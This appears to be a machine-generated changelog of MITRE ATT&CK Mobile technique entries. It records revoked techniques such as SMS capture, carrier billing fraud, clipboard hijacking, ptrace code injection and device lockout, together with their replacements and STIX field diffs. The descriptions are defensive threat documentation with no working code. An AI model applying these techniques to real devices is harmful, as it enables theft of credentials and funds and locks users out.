modified2020-03-27 15:28:03.858000+00:002022-03-30 14:43:46.019000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1412] Capture SMS Messages

Current version: 1.1

Description: A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication. On Android, a malicious application must request and obtain permission (either at app install time or run time) in order to receive SMS messages. Alternatively, a malicious application could attempt to perform an operating system privilege escalation attack to bypass the permission requirement. On iOS, applications cannot access SMS messages in normal operation, so an adversary would need to attempt to perform an operating system privilege escalation attack to potentially be able to access SMS messages.

This object has been revoked by [T1636.004] SMS Messages

Description for [T1636.004] SMS Messages: Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages. If the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1015
values_changed
STIX FieldOld valueNew Value
modified2019-09-18 18:28:50.898000+00:002022-04-01 13:27:29.880000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1448] Carrier Billing Fraud

Current version: 2.0

Description: A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases. Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread) Malicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread) On iOS, apps cannot send SMS messages. On Android, apps must hold the `SEND_SMS` permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).

This object has been revoked by [T1643] Generate Traffic from Victim

Description for [T1643] Generate Traffic from Victim: Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well. If done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1051
values_changed
STIX FieldOld valueNew Value
modified2020-05-04 15:40:20.943000+00:002022-04-06 13:57:38.841000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1510] Clipboard Modification

Current version: 1.0

Description: Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes) Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control. [Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

This object has been revoked by [T1641.001] Transmitted Data Manipulation

Description for [T1641.001] Transmitted Data Manipulation: Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making. Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact. One method to achieve [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) is by modifying the contents of the device clipboard. Malicious applications may monitor clipboard activity through the `ClipboardManager.OnPrimaryClipChangedListener` interface on Android to determine when clipboard contents have changed. Listening to clipboard activity, reading clipboard contents, and modifying clipboard contents requires no explicit application permissions and can be performed by applications running in the background. However, this behavior has changed with the release of Android 10. Adversaries may use [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) to replace text prior to being pasted. For example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control. [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1641/001) was seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-10-28 18:36:26.261000+00:002022-04-06 13:41:17.512000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']ESET Clipboard Modification February 2019Android 10 Privacy Changes
external_references[1]['description']ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019.Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.
external_references[1]['url']https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/https://developer.android.com/about/versions/10/privacy/changes#clipboard-data
external_references[2]['source_name']Welivesecurity Clipboard Modification February 2019Dr.Webb Clipboard Modification origin August 2018
external_references[2]['description']Lukáš Štefanko. (2019, February 8). First clipper malware discovered on Google Play. Retrieved July 26, 2019.Dr.Webb. (2018, August 8). Android.Clipper.1.origin. Retrieved July 26, 2019.
external_references[2]['url']https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/https://vms.drweb.com/virus/?i=17517750
external_references[3]['source_name']Syracuse Clipboard Modification 2014Dr.Webb Clipboard Modification origin2 August 2018
external_references[3]['description']Zhang, X; Du, W. (2014, January). Attacks on Android Clipboard. Retrieved July 26, 2019.Dr.Webb. (2018, August 8). Android.Clipper.2.origin. Retrieved July 26, 2019.
external_references[3]['url']http://www.cis.syr.edu/~wedu/Research/paper/clipboard_attack_dimva2014.pdfhttps://vms.drweb.com/virus/?i=17517761
external_references[4]['source_name']Dr.Webb Clipboard Modification origin2 August 2018ESET Clipboard Modification February 2019
external_references[4]['description']Dr.Webb. (2018, August 8). Android.Clipper.2.origin. Retrieved July 26, 2019.ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019.
external_references[4]['url']https://vms.drweb.com/virus/?i=17517761https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/
external_references[5]['source_name']Dr.Webb Clipboard Modification origin August 2018Welivesecurity Clipboard Modification February 2019
external_references[5]['description']Dr.Webb. (2018, August 8). Android.Clipper.1.origin. Retrieved July 26, 2019.Lukáš Štefanko. (2019, February 8). First clipper malware discovered on Google Play. Retrieved July 26, 2019.
external_references[5]['url']https://vms.drweb.com/virus/?i=17517750https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/
external_references[6]['source_name']Android 10 Privacy ChangesSyracuse Clipboard Modification 2014
external_references[6]['description']Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.Zhang, X; Du, W. (2014, January). Attacks on Android Clipboard. Retrieved July 26, 2019.
external_references[6]['url']https://developer.android.com/about/versions/10/privacy/changes#clipboard-datahttp://www.cis.syr.edu/~wedu/Research/paper/clipboard_attack_dimva2014.pdf

[T1540] Code Injection

Current version: 1.0

Description: Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries. With root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)

This object has been revoked by [T1631.001] Ptrace System Calls

Description for [T1631.001] Ptrace System Calls: Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 04:07:06.663000+00:002022-03-30 19:14:20.369000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']Shunix Code Injection Mar 2016Fadeev Code Injection Aug 2018
external_references[1]['description']Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019.Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019.
external_references[1]['url']https://shunix.com/shared-library-injection-in-android/https://fadeevab.com/shared-library-injection-on-android-8/
external_references[2]['source_name']Fadeev Code Injection Aug 2018Google Triada June 2019
external_references[2]['description']Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019.Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.
external_references[2]['url']https://fadeevab.com/shared-library-injection-on-android-8/https://security.googleblog.com/2019/06/pha-family-highlights-triada.html
external_references[3]['source_name']Google Triada June 2019Shunix Code Injection Mar 2016
external_references[3]['description']Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019.
external_references[3]['url']https://security.googleblog.com/2019/06/pha-family-highlights-triada.htmlhttps://shunix.com/shared-library-injection-in-android/

[T1605] Command-Line Interface

Current version: 1.0

Description: Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken. If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

This object has been revoked by [T1623.001] Unix Shell

Description for [T1623.001] Unix Shell: Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-17 17:31:52.802000+00:002022-03-30 14:00:45.099000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1447] Delete Device Data

Current version: 2.1

Description: Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019) Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

This object has been revoked by [T1630.002] File Deletion

Description for [T1630.002] File Deletion: Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019) Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1050
values_changed
STIX FieldOld valueNew Value
modified2020-10-01 12:52:58.150000+00:002022-03-30 19:50:37.727000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1401] Device Administrator Permissions

Current version: 2.0

Description: Adversaries may request device administrator permissions to perform malicious actions. By abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or make it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo) Device administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

This object has been revoked by [T1626.001] Device Administrator Permissions

Description for [T1626.001] Device Administrator Permissions: Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app. Device administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesGoogle. (n.d.). DeviceAdminInfo. Retrieved November 20, 2020.
external_referencesAPP-22
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1004
external_referencesAPP-22
external_referencesGoogle. (n.d.). DeviceAdminInfo. Retrieved November 20, 2020.
values_changed
STIX FieldOld valueNew Value
modified2020-11-24 13:40:08.343000+00:002022-04-01 16:52:36.965000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid DeviceAdminInfo
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.htmlhttps://developer.android.com/reference/android/app/admin/DeviceAdminInfo
external_references[2]['source_name']Android DeviceAdminInfoNIST Mobile Threat Catalogue
external_references[2]['url']https://developer.android.com/reference/android/app/admin/DeviceAdminInfohttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

[T1446] Device Lockout

Current version: 2.0

Description: An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment. On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword) On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

This object has been revoked by [T1629.002] Device Lockout

Description for [T1629.002] Device Lockout: An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018) Prior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesClaud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.
external_referencesAPP-28
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1049
external_referencesAPP-28
external_referencesClaud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-10-09 14:39:38.930000+00:002022-04-01 18:49:51.039000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueXiao-KeyRaider
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.htmlhttp://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/
external_references[3]['source_name']Xiao-KeyRaiderNIST Mobile Threat Catalogue
external_references[3]['url']http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

[T1408] Disguise Root/Jailbreak Indicators

Current version: 1.1

Description: An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).

This object has been revoked by [T1630.003] Disguise Root/Jailbreak Indicators

Description for [T1630.003] Disguise Root/Jailbreak Indicators: An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesDaniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016.
external_referencesEMM-5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1011
external_referencesEMM-5
external_referencesVaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:34:59.071000+00:002022-04-08 16:29:55.321000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueBrodie
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.htmlhttps://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf
external_references[2]['source_name']BrodieRastogi
external_references[2]['description']Daniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016.Vaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016.
external_references[2]['url']https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdfhttp://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf
external_references[4]['source_name']RastogiNIST Mobile Threat Catalogue
external_references[4]['url']http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdfhttps://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html

[T1520] Domain Generation Algorithms

Current version: 1.0

Description: Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1520) (DGAs) to procedurally generate domain names for command and control communication, and other uses such as malicious application distribution.(Citation: securelist rotexy 2018) DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.

This object has been revoked by [T1637.001] Domain Generation Algorithms

Description for [T1637.001] Domain Generation Algorithms: Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018) DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-09-23 14:53:42.654000+00:002022-04-05 20:03:46.788000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']securelist rotexy 2018Data Driven Security DGA
external_references[1]['description']T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.
external_references[1]['url']https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
external_references[2]['source_name']Data Driven Security DGAsecurelist rotexy 2018
external_references[2]['description']Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.
external_references[2]['url']https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

[T1466] Downgrade to Insecure Protocols

Current version: 1.1

Description: An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesJeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.
external_referencesCEL-3
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1069
external_referencesCEL-3
external_referencesJeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:16:13.386000+00:002022-04-06 15:50:42.480000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueNIST-SP800187
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.htmlhttp://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf
external_references[2]['source_name']NIST-SP800187NIST Mobile Threat Catalogue
external_references[2]['url']http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdfhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html

[T1439] Eavesdrop on Insecure Network Communication

Current version: 1.1

Description: If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)

This object has been revoked by [T1638] Adversary-in-the-Middle

Description for [T1638] Adversary-in-the-Middle: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesD. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016.
external_referencesAPP-1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1042
external_referencesAPP-0
external_referencesD. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:54:29.631000+00:002022-04-05 20:17:46.147000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CataloguemHealth
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.htmlhttps://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html
